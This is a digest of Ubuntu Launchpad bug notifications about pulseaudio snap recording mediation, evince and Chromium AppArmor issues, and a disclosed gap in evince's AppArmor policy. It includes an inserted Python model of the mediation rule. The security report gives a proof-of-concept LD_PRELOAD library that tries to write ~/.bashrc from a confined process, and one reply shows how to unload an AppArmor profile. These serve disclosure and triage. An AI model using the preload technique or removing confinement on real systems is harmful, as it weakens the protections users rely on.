  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For strict snaps with pulseaudio:
  $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap
  $ snap connections test-snapd-pulseaudio
  Interface   Plug                              Slot         Notes
  pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
  $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
  ...
  ^Cyes
  $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
  ...
  yes

  For strict snaps with audio-playback/audio-record:
  $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04
  $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap
  $ snap connections test-snapd-audio-record # record not connected
  Interface       Plug                                    Slot             Notes
  audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
  audio-record    test-snapd-audio-record:audio-record    -                -
  $ test-snapd-audio-record.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio-record/common/
  $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
  xcb_connecti
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed:

  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
  Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes
-
  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For strict snaps with pulseaudio:
  $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap
  $ snap connections test-snapd-pulseaudio
  Interface   Plug                              Slot         Notes
  pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
  $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
  ...
  ^Cyes
  $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
  ...
  yes
-
  For strict snaps with audio-playback/audio-record:
+ $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04
  $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap
  $ snap connections test-snapd-audio-record # record not connected
  Interface       Plug                                    Slot             Notes
  audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
  audio-record    test-snapd-audio-record:audio-record    -                -
  $ test-snapd-audio-record.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio-record/common/
  $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to me
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Attaching test-snapd-pulseaudio and test-snapd-audio-record snaps.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title: please enable snap mediation support

Status in pulseaudio package in Ubuntu: Fix Released
Status in pulseaudio source package in Xenial: In Progress
Status in pulseaudio source package in Bionic: In Progress

Bug description:

[Impact]
Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

[Test Case]

Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su

For unconfined applications:
$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes

$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes

$ paplay /tmp/out.wav && echo "yes"
yes

For confined, non-snap applications:
$ sudo apt-get install evince

$ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes

$ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes

$ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
yes

For classic snaps:
$ sudo snap install test-snapd-classic-confinement --classic

$ snap run --shell test-snapd-classic-confinement

$ cat /proc/self/attr/current # verify we are classic confined
snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)

$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes

$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes

$ paplay /tmp/out.wav && echo "yes"
yes

For strict snaps with pulseaudio:
$ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap

$ snap connections test-snapd-pulseaudio
Interface   Plug                              Slot         Notes
pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -

$ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
...

$ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/

$ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
xcb_connection_has_error() returned true
yes

(note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)

$ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
...
^Cyes

$ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
...
yes

For strict snaps with audio-playback/audio-record:
$ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap

$ snap connections test-snapd-audio-record # record not connected
Interface       Plug                                    Slot             Notes
audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
audio-record    test-snapd-audio-record:audio-record    -                -

$ test-snapd-audio-record.play --help # ensure SNAP dirs are created
...

$ sudo cp /usr/share/sounds/alsa/Noise.wav /va
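The record decision described in the bug description above (playback for everyone; record for non-snap clients, classic snaps, and strict snaps with pulseaudio or audio-record connected), as an added model that is not the pulseaudio module's code. It classifies a client by its AppArmor label and asks a constructed stand-in for snapd about confinement and connected interfaces; the ConstructedSnapd class and the shape of its answers are assumptions, and the five labels mirror the cases in the test plan.

```python
"""Model of the snap audio-record mediation rule from bug 1781428 (added example)."""

RECORD_INTERFACES = {"pulseaudio", "audio-record"}


def snap_name_from_label(label):
    """Map an AppArmor label to a snap name, or None for non-snap clients.

    Snap labels look like 'snap.<snap>.<app> (enforce)'; snap names never
    contain '.', so the second dotted component is the snap. 'unconfined'
    or a path such as '/usr/bin/evince (enforce)' is not a snap.
    """
    label = label.split(" ", 1)[0]  # drop the '(enforce)'/'(complain)' mode suffix
    if not label.startswith("snap."):
        return None
    parts = label.split(".")
    return parts[1] if len(parts) >= 3 and parts[1] else None


class ConstructedSnapd:
    """Stand-in for the snapd control socket (assumed shape, constructed data).

    Answers the two questions the description says the module asks:
    is the snap classic, and which interfaces are connected.
    """

    def __init__(self, snaps, connections):
        self._snaps = snaps              # name -> {"confinement": "strict"|"classic"}
        self._connections = connections  # name -> {"established": [{"interface": ...}]}

    def is_classic(self, snap):
        return self._snaps.get(snap, {}).get("confinement") == "classic"

    def connected_interfaces(self, snap):
        established = self._connections.get(snap, {}).get("established", [])
        return {c["interface"] for c in established}


def may_play(label, snapd):
    """Playback is allowed for every connected client, snap or not."""
    return True


def may_record(label, snapd):
    """Record is allowed for non-snap clients and classic snaps; a strict snap
    needs 'pulseaudio' or 'audio-record' connected. Unknown snaps fail closed."""
    snap = snap_name_from_label(label)
    if snap is None:
        return True
    if snapd.is_classic(snap):
        return True
    return bool(snapd.connected_interfaces(snap) & RECORD_INTERFACES)


# Constructed sample data mirroring the snaps used in the test plan.
SNAPD = ConstructedSnapd(
    snaps={
        "test-snapd-classic-confinement": {"confinement": "classic"},
        "test-snapd-pulseaudio": {"confinement": "strict"},
        "test-snapd-audio-record": {"confinement": "strict"},
    },
    connections={
        "test-snapd-pulseaudio": {"established": [{"interface": "pulseaudio"}]},
        # audio-record plug present but not connected, as in 'snap connections'
        "test-snapd-audio-record": {"established": [{"interface": "audio-playback"}]},
    },
)

# label -> expected record decision, one per case in the test plan
CASES = {
    "unconfined": True,
    "/usr/bin/evince (enforce)": True,
    "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)": True,
    "snap.test-snapd-pulseaudio.record (enforce)": True,
    "snap.test-snapd-audio-record.record (enforce)": False,
}


def run_cases(snapd=SNAPD, cases=CASES):
    """Return {label: (expected, actual)} for every case."""
    return {label: (want, may_record(label, snapd)) for label, want in cases.items()}


if __name__ == "__main__":
    for label, (want, got) in run_cases().items():
        print(f"{'ok ' if want == got else 'BAD'} record={got!s:5} {label}")
```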
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed:

+ [Impact]
+ Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.
- # Original summary: pulseaudio built with --enable-snappy but 'Enable
- Snappy support: no'
+ To correct this situation but not regress existing behavior, Ubuntu
+ 19.04's pulseaudio was updated patch to allow playback to all connected
+ clients (snaps or not), record by classic snaps (see bug 1787324) and
+ record by strict mode snaps if either the pulseaudio or new-in-
+ snapd-2.41 audio-record interfaces were connected. With this change,
+ snapd is in a position to migrate snaps to the new audio-playback and
+ audio-record interfaces and properly mediate audio recording (see
+ https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-
+ deprecation/13418).
+
+ The patch to pulseaudio consists of adding a module, enabling it in
+ default.pa and then when it is enabled, pulseaudio when faced with a
+ record operation will, when the connecting process is a snap (ie, its
+ security label (ie, apparmor label) starts with 'snap.'), query snapd
+ via its control socket to ask if the snap is classic and if not, whether
+ the pulseaudio or audio-record interfaces are connected. Adjusting
+ pulseaudio in the manner does not require coordination with any release
+ of snapd. It does need a newer version of snapd-glib, which was recently
+ updated to 1.49 in the last SRU.
+
+ [Test Case]
+
+ Since the pulseaudio mediation behavior triggers when the security label
+ starts with 'snap.' it is su
+
+ For unconfined applications:
+ $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
+ yes
+
+ $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
+ ^Cyes
+
+ $ paplay /tmp/out.wav && echo "yes"
+ yes
+
+ For confined, non-snap applications:
+ $ sudo apt-get install evince
+
+ $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav
+ && echo yes
+
+ $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
+ ^Cyes
+
+ $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
+ yes
+
+
+ For classic snaps:
+ $ sudo snap install test-snapd-classic-confinement --classic
+
+ $ snap run --shell test-snapd-classic-confinement
+
+ $ cat /proc/self/attr/current # verify we are classic confined
+ snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
+
+ $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
+ yes
+
+ $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
+ ^Cyes
+
+ $ paplay /tmp/out.wav && echo "yes"
+ yes
+
+ For strict snaps with pulseaudio:
+ $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap
+
+ $ snap connections test-snapd-pulseaudio
+ Interface   Plug                              Slot         Notes
+ pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
+
+ $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
+ ...
+
+ $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-
+ pulseaudio/common/
+
+ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
+ xcb_connection_has_error() returned true
+ yes
+
+ (note, the xcb_connection_has_error() message is due to the x11
+ interface not being connected which is unrelated to mediation. x11 is
+ left out to ensure that just audio-playback/audio-record are tested)
+
+ $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
+ ...
+ ^Cyes
+
+ $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
+ ...
+ yes
+
+
+ For strict snaps with audio-playback/audio-record:
+ $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap
+
+ $ snap connections test-snapd-audio-record # record not connected
+ Interface       Plug                                    Slot             Notes
+ audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
+ audio-record    test-snapd-audio-record:audio-record    -                -
+
+ $ test-snapd-audio-record.play --help # ensure SNAP dirs are created
+ ...
+
+ $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio-
+ record/common/
+
+ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
+ xcb_connection_has_error() returned true
+ yes
+
+ (note, the xcb_connection_has_error() message is due to the x11
+ interface not being connected which is un
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Attachment added: "test-snapd-audio-record_1_amd64.snap"
   https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+attachment/5292539/+files/test-snapd-audio-record_1_amd64.snap
[Desktop-packages] [Bug 1781428] Re: pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
** Description changed:

+
+ # Original summary: pulseaudio built with --enable-snappy but 'Enable
+ Snappy support: no'
+
+ # Original description
  From https://launchpadlibrarian.net/377100864/buildlog_ubuntu-cosmic-amd64.pulseaudio_1%3A12.0-1ubuntu1_BUILDING.txt.gz:
  ...
  dh_auto_configure -- --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
  ./configure --build=x86_64-linux-gnu --prefix=/usr --includedir=\${prefix}/include --mandir=\${prefix}/share/man --infodir=\${prefix}/share/info --sysconfdir=/etc --localstatedir=/var --disable-silent-rules --libdir=\${prefix}/lib/x86_64-linux-gnu --libexecdir=\${prefix}/lib/x86_64-linux-gnu --disable-maintainer-mode --disable-dependency-tracking --enable-x11 --disable-hal-compat --libdir=\${prefix}/lib/x86_64-linux-gnu --with-module-dir=\${prefix}/lib/pulse-12.0/modules --with-zsh-completion-dir=\${datadir}/zsh/vendor-completions --with-bash-completion-dir=\${datadir}/bash-completion/completions --with-systemduserunitdir=\${prefix}/lib/systemd/user --enable-snappy --disable-bluez4 --enable-gsettings --disable-gconf
  ...
  Enable Ubuntu trust store: no
  Enable Snappy support: no
  Enable Apparmor: yes
-
- At this point, the patch should probably be dropped, otherwise applications like chromium, etc will no longer be able to record.
+ At this point, the patch should probably be dropped, otherwise
+ applications like chromium, etc will no longer be able to record.
** Summary changed:

- pulseaudio built with --enable-snappy but 'Enable Snappy support: no'
+ please enable snap mediation support
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1781428/+subscriptions

--
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1834386] Re: Ebooks thumbnails fail in Nemo over SMB
(nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem-hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format

This suggests that the problem is not due to the apparmor profile (it happens before the denial). Is the thumbnail correctly generated if you do:

sudo apparmor_parser -R /etc/apparmor.d/usr.bin.evince

(this unloads the policy from the kernel).

** Changed in: evince (Ubuntu)
       Status: New => Incomplete

** Tags added: apparmor

--
https://bugs.launchpad.net/bugs/1834386

Title: Ebooks thumbnails fail in Nemo over SMB

Status in evince package in Ubuntu: Incomplete

Bug description:

Nemo is unable to generate ebooks thumbnails over SMB share because of evince-thumbnailer apparmor profile (note that Nautilus is able to do it anyway), I removed apparmor to see and it fixed that issue.

Nemo output when generating thumbs:
-
(nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.200: Error creating thumbnail for smb://akem-hp.local/comics_bds_mangas/Scrooge/Uncle%20Scrooge%20(001-100)%20GetComics.INFO/029%20Uncle%20Scrooge.cbr: Unrecognized image file format
Error loading remote document: An AppArmor policy prevents this sender from sending this message to this recipient; type="method_call", sender=":1.243" (uid=1000 pid=1488 comm="evince-thumbnailer -s 128 smb://akem-hp.local/comi" label="/usr/bin/evince-thumbnailer (enforce)") interface="org.gtk.vfs.MountTracker" member="LookupMount" error name="(unset)" requested_reply="0" destination=":1.10" (uid=1000 pid=1725 comm="/usr/lib/gvfs/gvfsd " label="unconfined")
(nemo:31811): CinnamonDesktop-WARNING **: 01:08:30.365: Unable to create loader for mime type application/x-cbr: Unrecognized image file format
-
Note that it does the same with pdf or some other ebooks format.

The problem happens in loopback too, just share a folder with ebooks using SMB, flush the thumbnails and open Nemo to that folder via Network (connect to the SMB).

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: evince 3.28.4-0ubuntu1.2
ProcVersionSignature: Ubuntu 4.18.0-22.23~18.04.1-generic 4.18.20
Uname: Linux 4.18.0-22-generic x86_64
NonfreeKernelModules: nvidia_modeset nvidia
ApportVersion: 2.20.9-0ubuntu7.5
Architecture: amd64
Date: Thu Jun 27 02:11:28 2019
InstallationDate: Installed on 2019-05-31 (26 days ago)
InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210)
SourcePackage: evince
UpgradeStatus: No upgrade log present (probably fresh install)
[Desktop-packages] [Bug 1828275] Re: [snap] chromium generates a lot of Apparmor noise
You can 'sudo snap connect chromium:mount-observe' for /etc/fstab. /run/mount/utab is more complicated and you can read about it here: https://forum.snapcraft.io/t/namespace-awareness-of-run-mount-utab-and-libmount/5987

For the /run/udev/data accesses, can you paste the output of:
$ cat /run/udev/data/b230\:*

** Package changed: chromium-browser (Ubuntu) => snapd (Ubuntu)

** Changed in: snapd (Ubuntu)
       Status: New => Incomplete

--
https://bugs.launchpad.net/bugs/1828275

Title: [snap] chromium generates a lot of Apparmor noise

Status in snapd package in Ubuntu: Incomplete

Bug description:

Running Chromium's snap results in a lot of Apparmor noise like this:

audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/mount/utab" pid=0 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(0): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/b230:0" pid=0 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0

The above and the attached log were collected with:
journalctl -o cat -k | grep -F ' apparmor="DENIED" ' | grep -F snap.chromium.chromium | sed 's/ audit([0-9.:]\+): / audit(0): /; s/ pid=[0-9]\+ / pid=0 /' | sort

Additional information:

$ snap info chromium
name:      chromium
summary:   Chromium web browser, open-source version of Chrome
publisher: Canonical✓
contact:   https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bugs?field.tag=snap
license:   unset
description: |
  An open-source browser project that aims to build a safer, faster, and more stable way for all Internet users to experience the web.
commands:
  - chromium.chromedriver
  - chromium
snap-id:      XKEcBqPM06H1Z7zGOdG5fbICuf8NWK5R
tracking:     edge
refresh-date: 11 days ago, at 12:08 EDT
channels:
  stable:    74.0.3729.131 2019-05-02 (705) 162MB -
  candidate: 74.0.3729.131 2019-05-01 (705) 162MB -
  beta:      74.0.3729.61  2019-04-06 (688) 162MB -
  edge:      75.0.3770.9   2019-04-27 (703) 163MB -
installed:   75.0.3770.9 (703) 163MB -

$ snap interfaces chromium
Slot                            Plug
:browser-support                chromium:browser-sandbox
:camera                         chromium
:desktop                        chromium
:gsettings                      chromium
:home                           chromium
:network                        chromium
:network-bind                   chromium
:opengl                         chromium
:personal-files                 chromium:chromium-config
:pulseaudio                     chromium
:screen-inhibit-control         chromium
:u2f-devices                    chromium
:unity7                         chromium
:upower-observe                 chromium
:x11                            chromium
gtk-common-themes:gtk-3-themes  chromium
gtk-common-themes:icon-themes   chromium
gtk-common-themes:sound-themes  chromium
-                               chromium:cups-control
-                               chromium:mount-observe
-                               chromium:network-manager
-                               chromium:password-manager-service
-                               chromium:removable-media

$ apt-cache policy snapd
snapd:
  Installed: 2.38+18.04
  Candidate: 2.38+18.04
  Version table:
 *** 2.38+18.04 500
        500 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages
        100 /var/lib/dpkg/status
     2.37.4+18.04.1 500
        500 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages
     2.32.5+18.04 500
        500 http://archive.ubuntu.com/ubuntu bionic/main amd64 Packages

$ lsb_release -rd
Description: Ubuntu 18.04.2 LTS
Release:     18.04
[Desktop-packages] [Bug 1826415] Re: Videos do not play in presentation mode
** Tags removed: apparmor

--
https://bugs.launchpad.net/bugs/1826415

Title: Videos do not play in presentation mode

Status in Evince: New
Status in evince package in Ubuntu: Triaged

Bug description:

It is not possible to play embedded videos in the presentation mode. This affects PDF slides created with the beamer/multimedia latex package. Initially, no controls are shown on the slide with the video. In the normal mode, video controls appear when the video is clicked with the mouse. However, in the presentation mode, evince goes to the next page when one clicks with the mouse so that the controls do not appear and the video can only be played by exiting the presentation mode. Playing videos works fine in presentation mode with the okular PDF-viewer.

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: evince 3.28.4-0ubuntu1
Uname: Linux 4.15.0-041500rc6-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.6
Architecture: amd64
CurrentDesktop: GNOME
Date: Thu Apr 25 16:15:43 2019
InstallationDate: Installed on 2015-11-05 (1267 days ago)
InstallationMedia: Ubuntu 14.04.3 LTS "Trusty Tahr" - Beta amd64 (20150805)
SourcePackage: evince
UpgradeStatus: Upgraded to bionic on 2018-05-24 (335 days ago)
[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
Ubuntu 14.04 LTS is now out of standard support and evince is not included in ESM.

** Changed in: evince (Ubuntu Trusty)
       Status: In Progress => Won't Fix

--
https://bugs.launchpad.net/bugs/1788929

Title: Debian/Ubuntu AppArmor policy gaps in evince

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in evince package in Ubuntu: Fix Released
Status in apparmor source package in Trusty: Fix Released
Status in evince source package in Trusty: Won't Fix
Status in apparmor source package in Xenial: Fix Released
Status in evince source package in Xenial: In Progress
Status in apparmor source package in Bionic: Fix Released
Status in evince source package in Bionic: In Progress
Status in apparmor source package in Cosmic: Fix Released
Status in evince source package in Cosmic: Fix Released

Bug description:

[Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...]

Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation:
https://twitter.com/alex_murray/status/1032780425834446849
https://twitter.com/alex_murray/status/1032796879640190976

This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer. For example, read+write access to almost the entire home directory is granted:

/usr/bin/evince-thumbnailer {
[...]
  # Lenient, but remember we still have abstractions/private-files-strict in
  # effect).
  @{HOME}/ r,
  owner @{HOME}/** rw,
  owner /media/** rw,
}

As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc:

[...]
  # don't allow reading/updating of run control files
  deny @{HOME}/.*rc mrk,
  audit deny @{HOME}/.*rc wl,

  # bash
  deny @{HOME}/.bash* mrk,
  audit deny @{HOME}/.bash* wl,
  deny @{HOME}/.inputrc mrk,
  audit deny @{HOME}/.inputrc wl,
[...]

Verification:

user@ubuntu-18-04-vm:~$ cat preload2.c
#define _GNU_SOURCE
/* include list reconstructed: the angle-bracketed header names were lost
   in the mailing-list extraction */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <err.h>
#include <sys/stat.h>

/* runs when the library is loaded, before the host program's main() */
__attribute__((constructor)) static void entry(void) {
  printf("constructor running from %s\n", program_invocation_name);
  int fd = open("/home/user/.bashrc", O_WRONLY);
  if (fd != -1) {
    printf("success\n");
  } else {
    perror("open .bashrc");
  }
  exit(0);
}
user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC
user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
constructor running from evince-thumbnailer
open .bashrc: Permission denied
user@ubuntu-18-04-vm:~$ dmesg|tail -n1
[ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000

